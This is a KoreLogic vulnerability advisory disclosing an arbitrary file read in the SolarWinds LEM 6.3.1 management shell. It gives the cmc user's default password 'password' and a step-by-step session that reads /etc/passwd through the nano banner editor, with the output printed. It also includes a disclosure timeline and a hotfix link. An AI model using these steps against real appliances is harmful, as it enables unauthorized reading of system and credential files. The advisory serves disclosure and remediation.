Solarwinds LEM 6.3.1 Management Shell Arbitrary File Read

`KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read  
  
Title: Solarwinds LEM Management Shell Arbitrary File Read  
Advisory ID: KL-001-2017-008  
Publication Date: 2017.04.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-008.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Solarwinds  
Affected Product: Log and Event Manager Virtual Appliance  
Affected Version: v6.3.1  
Platform: Embedded Linux  
CWE Classification: CWE-36: Absolute Path Traversal  
Impact: Information Disclosure  
Attack vector: SSH  
  
2. Vulnerability Description  
  
The management shell allows the end user to edit the MOTD banner  
displayed during SSH logon. The editor provided for this is  
nano. This editor has a keyboard mapped function which lets  
the user import a file from the local file system into the  
editor. An attacker can abuse this to read arbitrary files  
within the allowed permissions.  
  
3. Technical Description  
  
Should an attacker gain access to the SSH console for the  
cmc user, read access to files on the local filesystem can be  
achieved. The default password for the cmc user is "password".  
  
This is accomplished by abusing the editor selection for the  
MOTD banner edit functionality.  
  
$ ssh [email protected]  
Password:  
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64  
Last login: Sun Dec 11 11:35:29 2016 from 1.3.3.6  
//////////////////////////////////////////////////  
/// SolarWinds Log & Event Manager ///  
/// management console ///  
//////////////////////////////////////////////////  
  
Detected VMware Virtual Platform  
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH  
Available commands:  
[ appliance ] Network, System  
[ manager ] Upgrade, Debug  
[ service ] Restrictions, SSH, Snort  
[ ndepth ] nDepth Configuration/Maintenance  
upgrade Upgrade this Appliance  
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)  
import Import a file that can be used from the Admin UI  
help display this help  
exit Exit  
cmc > appliance  
Available commands:  
activate Activate appliance features after licensing.  
checklogs Check Appliance Logs for Remote Data  
clearsyslog Clear Syslog Logs  
cleantemp * Clean Up Temporary Files  
multimanagerconfig * Enable/disable multimanager  
dateconfig Update Date and Time  
dbdiskconfig * Configure database retention  
diskusage Check Disk Usage of your Manager  
diskusageconfig Set Disk Usage Limit of your Manager  
editbanner Edit the SSH login banner.  
exportsyslog Export System Logs  
hostname Change the Manager Appliance hostname  
import Import SIM/LEM Backup to LEM  
limitsyslog Configure the syslog rotation limit (default: 50)  
setlogrotate Configure the syslog rotation frequency (hourly or daily)  
netconfig Configure Network Parameters (IP Address, Netmask, DNS)  
ntpconfig Update NTP Server Preferences  
password Change the CMC User Password  
ping Ping an IP address or hostname  
reboot Reboot the Manager Appliance  
resetsystemmac Reset the MAC address of the Appliance  
shutdown Shut Down the Manager Appliance  
top View Manager Appliance CPU/Memory Utilization  
tzconfig Update Time Zone information  
viewnetconfig View Network Parameters (IP address, netmask, DNS)  
exit Return to main menu  
  
NOTE: Commands with an asterisk (*) include an automatic manager service restart  
cmc::appliance > editbanner  
Press <enter> to configure the SSH banner.  
  
Once inside nano, ^R to get the screen below:  
  
File to insert [from ./] : /etc/passwd  
^G Get Help  
^C Cancel  
  
The result will be:  
  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
Debian-exim:x:102:102::/var/spool/exim4:/bin/false  
trigeo:x:1000:1000:trigeo,,,:/usr/local/contego/:/bin/bash  
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin  
postgres:x:101:104:PostgreSQL administrator,,,:/var/lib/postgres:/bin/bash  
cmc:x:1001:1000:CMC,,,:/usr/local/contego/:/usr/local/contego/scripts/mgrconfig.pl  
libuuid:x:105:107::/var/lib/libuuid:/bin/sh  
snort:x:103:105:Snort IDS:/var/log/snort:/bin/false  
messagebus:x:106:109::/var/run/dbus:/bin/false  
snmp:x:104:108::/var/lib/snmp:/bin/false  
lynx:x:1002:1003::/home/lynx:/bin/sh  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has released a Hotfix to remediate this  
vulnerability. Hotfix and installation instructions are  
available at:  
  
https://thwack.solarwinds.com/thread/111223  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
and Hank Leininger of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.02.16 - KoreLogic sends vulnerability report and PoC to  
Solarwinds <[email protected]> using PGP key  
with fingerprint  
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.  
2017.02.20 - Solarwinds replies that the key is no longer in  
use, requests alternate communication channel.  
2017.02.22 - KoreLogic submits vulnerability report and PoC to  
alternate Solarwinds contact.  
2017.02.23 - Solarwinds confirms receipt of vulnerability  
report.  
2017.04.06 - 30 business days have elapsed since Solarwinds  
acknowledged receipt of vulnerability details.  
2017.04.11 - Solarwinds releases hotfix and public disclosure.  
2017.04.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`